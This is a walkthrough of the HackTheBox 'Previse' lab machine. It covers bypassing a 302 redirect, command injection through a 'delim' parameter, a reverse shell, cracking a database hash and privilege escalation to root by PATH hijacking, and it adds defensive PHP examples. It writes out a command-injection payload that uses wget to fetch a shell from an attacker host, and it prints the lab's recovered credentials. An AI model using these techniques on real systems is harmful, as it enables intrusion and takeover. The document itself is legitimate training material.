In this post, I would like to share a walkthrough of the Previse Machine from HackTheBox


This machine is rated Easy on HackTheBox.

What will you gain from the Previse machine?


For the user flag, you will download a file from the website and get a shell with the help of BurpSuite.


As for the root flag, you need to perform a PATH injection to get a root reverse shell.

Information Gathering


Once we have started the VPN connection (the configuration file is downloaded from HackTheBox), we can start information gathering on the machine by running the command nmap -sC -sV -p- <IP Address> -Pn


Let’s try to open the website


We are redirected to the Previse File Storage login page, where I cannot find any useful information to work with.


Let’s run gobuster to enumerate interesting directories and PHP files.


The command to use here is something like:

gobuster dir -u http://<machine ip> -w /usr/share/wordlists/dirb/common.txt -x php


The gobuster result shows a few interesting files, such as config.php.


Oh, wait! The result also shows status codes 403 and 302 for certain pages.


For more information on those status codes, a quick search on the internet turned up the information here.


Next, we open BurpSuite to inspect the web traffic.


Once we have BurpSuite started, we go to Proxy > Options and add a match/replace rule that rewrites the response status line from 302 Found to 200 OK. This works because the server sends the redirect header but still emits the page body, so a client that does not follow the redirect gets to see the content.


Let’s try to access accounts.php through BurpSuite with that rule active.
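Why does rewriting the status line expose the page at all? The following is an added illustration of my own, not code taken from the Previse site, showing a protected page whose login check sends a redirect but, in the vulnerable variant, forgets to stop executing. The file name guard_demo.php, the /login.php target and the fixed query parameter are assumptions made for the demo.

```php
<?php
// Added illustration, not code from the Previse box: a "protected" page whose
// login check redirects unauthenticated visitors. Run it with
//   php -S 127.0.0.1:8080 guard_demo.php
// then compare:
//   curl -i 'http://127.0.0.1:8080/?fixed=0'   (vulnerable variant)
//   curl -i 'http://127.0.0.1:8080/?fixed=1'   (fixed variant)
// No session handling is wired up, so every visitor counts as not logged in.

$loggedIn = false;                              // stand-in for a real session check
$fixed    = (($_GET['fixed'] ?? '0') === '1');  // which variant to demonstrate

if (!$loggedIn) {
    header('Location: /login.php', true, 302);  // tell the browser to go to the login page

    if ($fixed) {
        // Correct: stop executing. The client receives only the 302 and an empty body.
        exit;
    }

    // Vulnerable: without exit(), PHP keeps running and everything below is sent
    // along with the 302. A browser follows the redirect and never shows it, but
    // any client that ignores the redirect, or a proxy that rewrites "302 Found"
    // to "200 OK" as in the walkthrough, sees the protected content.
}
?>
<!DOCTYPE html>
<html>
<body>
  <h1>Account administration</h1>
  <p>This content should only be visible to logged-in users.</p>
</body>
</html>
```

Under curl -i the vulnerable variant returns 302 Found followed by the full HTML body, while the fixed one returns the same status with an empty body; a browser hides the difference because it follows the redirect either way. The check worth doing during a review is therefore to look at the body length of every 302 response, not just the status code, and the fix is the single exit after header().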

Gaining Privileged Access


The website has been loading for a while now, so let’s look at BurpSuite.


On the Intercept tab, I notice that there is a request waiting to be forwarded to the website.


After forwarding the request, we get a page for creating a new account.


Once a new user has been added to the database, we should be able to log in and see the Dashboard.


From the screenshot above, we should browse around the website in search of useful details.


In the Files section there’s a file called SITEBACKUP.ZIP, which we can download to our machine.


Unzipping the file reveals a bunch of PHP files, as shown in the screenshot above. We should read all of them, but one file in particular caught my eye: config.php.


It contains the MySQL connection configuration, but sadly we cannot use the credentials right now. However, we should save the username and password from config.php, as they might be useful later.


The only problem we face right now is how to get a reverse shell on the machine itself.


While looking through the other files, we stumbled on an interesting one, logs.php, where the value of {$_POST['delim']} is used directly inside the command the script runs.
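To make the {$_POST['delim']} finding concrete, here is an added example of my own (not the logs.php from the Previse backup) that puts the unsafe pattern next to a hardened version. The script path /opt/example/log_export.py and the allowlist of delimiter names are assumptions; the functions only build the command string and never run it.

```php
<?php
// Added example, not the logs.php shipped with Previse: the unsafe pattern the
// walkthrough points at, next to a hardened version. Nothing is executed here;
// both functions only build the command line so it can be inspected.
// The export script path and the allowed delimiter names are assumptions.

const LOG_EXPORT_SCRIPT = '/opt/example/log_export.py';   // hypothetical path

// Vulnerable: the POST parameter is interpolated straight into a string that
// exec() would hand to /bin/sh, so shell metacharacters in it (| ; && $( ) ...)
// are interpreted as shell syntax rather than as a delimiter name.
function buildCommandVulnerable(string $delim): string
{
    return "/usr/bin/python3 " . LOG_EXPORT_SCRIPT . " {$delim}";
}

// Hardened: the value must match a closed allowlist of the delimiter names the
// form actually offers (assumed here), and the argument is still quoted with
// escapeshellarg() as a second layer, so it is passed as one literal word.
function buildCommandHardened(string $delim): ?string
{
    $allowed = ['comma', 'space', 'tab'];
    if (!in_array($delim, $allowed, true)) {
        return null;                                         // reject, do not sanitise
    }
    return "/usr/bin/python3 " . escapeshellarg(LOG_EXPORT_SCRIPT)
         . " " . escapeshellarg($delim);
}

// Demonstration with a benign value and with an injected one shaped like the
// walkthrough's delim=comma|<command>; "id" is used as a harmless stand-in.
foreach (['comma', 'comma|id'] as $input) {
    echo "input:      {$input}\n";
    echo "vulnerable: " . buildCommandVulnerable($input) . "\n";
    echo "hardened:   " . (buildCommandHardened($input) ?? '<rejected>') . "\n\n";
}
```

Running it with php shows the pipe surviving intact in the vulnerable string and the whole value being rejected by the hardened one. The allowlist is the real control; escapeshellarg() is only a second layer. Where the shell is not needed at all, proc_open() accepts the command as an array of arguments on PHP 7.4 and later, which avoids /bin/sh entirely.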


We also notice that there’s a Log Data section under the Management Menu on the website.


The page looks something like the screenshot above; clicking the Submit button returns a file.


When I opened the file, I noticed a lot of lines in it. We might find a username that can log into the machine.

BurpSuite Intercept


Let’s analyze the flow using BurpSuite, where we notice a request body containing delim=comma.


We should edit php-reverse-shell.php to set our own IP address and a listening port.


A few things need to be running on our attacking machine: a Python HTTP server to serve the file and a netcat (nc) listener.


Once those are running, we can trigger the reverse shell through BurpSuite.


In the BurpSuite request, we append a second command that fetches our php-reverse-shell.php: delim=comma|wget http://<ip>:<port>/php-reverse-shell.php


Sadly, we got a 302 Found response, which shouldn’t be happening.

How to solve this issue?


After a while, we should log back into the website and retry.


Aside from that, I have renamed php-reverse-shell.php to shell.php, just in case.


Once we have fully modified it, we should try to get a reverse shell again.


It is looking surprisingly good so far, so let’s continue to the next step.

To trigger the reverse shell, we need to request the uploaded shell file in the browser.

Boom! We got a reverse shell on our attacker’s machine.

MySQL enumeration on the Previse machine


Let’s enumerate the database using the credentials we found earlier. Sadly, the command returned a MySQL syntax error.


My bad! I ran the wrong command previously, and I am running the correct command now. Surprisingly, it works like a charm!


We can also read the usernames and password hashes stored in MySQL (my own username is there too).


To get the password, we need to crack the hash we found in MySQL.


For that purpose, we can use hashcat, which recovers the password for us.


As a result, we have the credentials as shown below:

  • username: m4lwhere
  • password: ilovecody112235!
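The reason hashcat can turn the stored hash back into a password is the way it was stored. The following is an added example of my own, not code from the box, contrasting a fast unsalted digest with PHP's password_hash() API. The demo password is made up, and md5() is used only as a representative fast hash; the walkthrough does not say which algorithm the box used.

```php
<?php
// Added example, not code from the Previse box: why a password hash pulled from
// a database can be recovered offline with hashcat, and what to store instead.
// md5() stands in for any fast digest; the walkthrough does not say which
// algorithm the box used and none is claimed here.

// Weak: a fast, unsalted digest. Each guess costs one cheap hash operation,
// identical passwords produce identical hashes, and precomputed tables apply.
function storeWeak(string $password): string
{
    return md5($password);
}

// Hardened: PHP's password API (bcrypt under PASSWORD_DEFAULT today) adds a
// random salt and makes every guess deliberately expensive; raise the cost
// factor over time as hardware gets faster.
function storeStrong(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT, ['cost' => 12]);
}

function verifyStrong(string $password, string $stored): bool
{
    return password_verify($password, $stored);
}

// Rough throughput comparison: how many guesses per second each scheme allows
// on this machine (hashcat on a GPU does far better against the weak one).
function guessesPerSecond(callable $hasher, int $n): float
{
    $start = microtime(true);
    for ($i = 0; $i < $n; $i++) {
        $hasher("guess{$i}");
    }
    return $n / (microtime(true) - $start);
}

$pw     = 'correct horse battery staple';      // constructed demo value
$weak   = storeWeak($pw);
$strong = storeStrong($pw);

echo "md5:           {$weak}\n";               // identical on every run
echo "password_hash: {$strong}\n";             // different salt on every run
echo "verify ok:     " . var_export(verifyStrong($pw, $strong), true) . "\n";
echo "verify wrong:  " . var_export(verifyStrong('not-the-password', $strong), true) . "\n";

printf("md5 guesses/s:    %.0f\n", guessesPerSecond('md5', 200000));
printf("bcrypt guesses/s: %.1f\n", guessesPerSecond(
    fn($p) => password_hash($p, PASSWORD_BCRYPT, ['cost' => 12]), 5));
```

The two printf lines give a feel for the cost gap on a CPU; a GPU cracking rig widens it by orders of magnitude against the fast digest while gaining comparatively little against bcrypt. Note that password_hash() output changes on every run because of the random salt, so always compare with password_verify(), never with string equality.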

Maintaining Privileged Access on the Previse Machine


We can access the machine via SSH using the credentials we found previously.


We can read the user flag by executing the command “cat user.txt”.

Escalating to Root Privileges on the Previse Machine


To escalate to root, we need to find a SUID file that we can abuse.


Typing the command “sudo -l” shows that we can run /opt/scripts/access_backup.sh.


Reading access_backup.sh, we see that it calls gzip by name rather than by absolute path, so the script will run whatever gzip is found first in PATH.


I have created a file called gzip that contains a reverse shell command (bash command) under the /dev/shm directory.


We need to make our gzip file executable.


We then export PATH with /dev/shm in front, so that our gzip is found before the real one.


Next, we run the script with sudo, but we need to start our listener before executing it.


Voila! We get a shell back as root and can read the root flag with the command “cat /root/root.txt”.